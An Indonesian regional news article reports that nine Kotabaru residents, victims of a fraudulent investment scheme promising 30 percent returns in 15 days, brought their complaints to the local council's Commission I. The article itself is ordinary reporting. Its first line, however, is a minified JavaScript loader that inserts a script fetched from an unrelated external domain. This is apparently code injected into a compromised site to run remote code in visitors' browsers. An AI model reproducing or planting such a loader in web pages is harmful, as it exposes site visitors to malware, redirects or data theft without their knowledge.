(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
DPRD KOTABARU

Jadi Korban Investasi Bodong, 9 Warga  Datangi DPRD Kotabaru


KANALKALIMANTAN.COM, KOTABARU – Saat ini marak mengenai informasi tentang investasi bodong, yang mana empat orang tersangkanya telah ditangkap oleh jajaran anggota Polres Tanahbumbu, Kalsel.

Di antara para korbannya, ada yang dari Kabupaten Kotabaru dan ini menjadi perhatian banyak pihak. Termasuk bagi kalangan anggota DPRD Kotabaru dari Komisi I.

Senin (8/11/2021), sembilan warga mendatangi kantor DPRD Kotabaru dan disambut oleh Komisi I dalam rangka mengadukan terkait dengan investasi bodong yang merugikan mereka.

“Kami dari Komisi I, tadi menerima kedatangan masyarakat yang menjadi korban investasi bodong,” ujar Rabbiansyah selaku Sekretaris Komisi I, yang akrab disapa Roby.

 

 

Baca juga: Tanam Ganja di Pot Bunga, Pria Bertato di Sumut Diciduk Polisi

Dia mengatakan, adapun warga yang datang semuanya dari Dapil 3 wilayah Kecamatan Sungai Durian, Pamukan Barat dan Pamukan Utara.

“Untuk kerugian korbannya sendiri bervariasi, mulai dari Rp 1,3 miliar, Rp 1 miliar dan Rp 350 juta bahkan yang masih belum melaporkan di belakang masih puluhan orang dengan nilai kerugian juga lebih dari ratusan juta rupiah,” beber dia.

Bahkan, lanjut Roby, beberapa orang yang jumlah kerugiannya juga mencapai angka miliaran rupiah. Selain itu, ia juga melakukan pendampingan kepada masyarakat yang memasukkan laporannya ke Polres Kotabaru.

Baca juga: Kasus COVID-19 di China Naik Lagi, Gara-gara Varian Baru?

“Saya merasa ikut prihatin, karena mereka masyarakat yang menjadi korban praktik investasi bodong itu. Oleh karenanya, saya tadi ikut mendampingi warga dan langsung menghadap Kasat Reskrim yang di terima secara baik serta di arahkan beliau untuk melaporkan secara resmi,” jelas dia.

Ia juga mengimbau kepada masyarakat utamanya yang menjadi korban agar segera melaporkan secara resmi ke Polres Kotabaru.

Tentunya juga di ingatkan olehnya jangan sampai ikut investasi yang menggiurkan jauh dari nalar jika di janjikan keuntungan yang sangat besar. Biasakan berinvetasi harus legal dan logis agar tidak merugikan diri sendiri dan orang lain.

Menjadi harapannya mudah-mudahan dengan pelaporan kepada pihak berwajib akan mendapatkan titik temu dari perkara yang di hadapi.

Baca juga: Periksa 8 Orang, BNNP Akan Telusuri Pelanggan di Spa Jogja yang Terlibat Peredaran Sabu

Meskipun bagi para korban untuk dapat kembali modal 100 persen adalah sesuatu yang tidak mungkin. Tetapi dengan membuat pelaporan resmi adalah upaya para korban dalam menyikapi korban.

“Dari aduan warga itu, dijelaskan modus dari pelaku adalah dengan mengiming-imingi para korban dengan hasil fantastis, semisal dengan menanam saham Rp 1 juta, maka dalam tempo 15 hari akan di kembalikan sebesar Rp 1,3 juta. Makin besar ikut menanam saham, maka makin besar pula keuntungan para nasabah yang di janjikan,” tutup dia. (kanalkalimantan.com/muhammad)

Reporter: muhammad
Editor: Dhani


Risa

Recent Posts

KPU Banjarbaru Mulai Siapkan Pembentukan Badan Ad-hoc Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Komisioner Komisi Pemilihan Umum (KPU) Kota Banjarbaru menerima beberapa catatan menjelang pembentukan… Read More

5 jam ago

Raperda Inisiatif Sistem Drainase Tawaran Solusi Banjir dan Genangan Air di Ibu Kota

KANALKALIMANTAN.COM, BANJARBARU - Persoalan banjir dan genangan air masih menjadi pekerjaan rumah (PR) yang hingga… Read More

6 jam ago

Upaya Meningkatkan Akreditasi Perpustakaan di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Dinas Kearsipan dan Perpustakaan Daerah (Darpusda) Kota Banjarbaru menggelar sosialisasi pembinaan perpustakaan… Read More

6 jam ago

Cabang Musabaqah Syarhil Qur’an Kafilah HSU Putra Putri Lolos ke Final

KANALKALIMANTAN.COM, RANTAU - Hari ketiga Musabaqah Tilawatil Quran (MTQ) Nasional XXXV tingkat Provinsi Kalimantan Selatan… Read More

7 jam ago

65 Peserta Calon Guru Penggerak di Kabupaten Banjar Ikuti Lokakarya

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur mengingatkan para tenaga pengajar bahwa yantangan di… Read More

8 jam ago

Bupati Banjar Buka Temu Teknis Penyuluh Pertanian se Kabupaten Banjar

KANALKALIMANTAN.COM, MARTAPURA - Bupati Banjar H Saidi Mansyur membuka Temu Teknis Penyuluh Pertanian se Kabupaten… Read More

8 jam ago

This website uses cookies.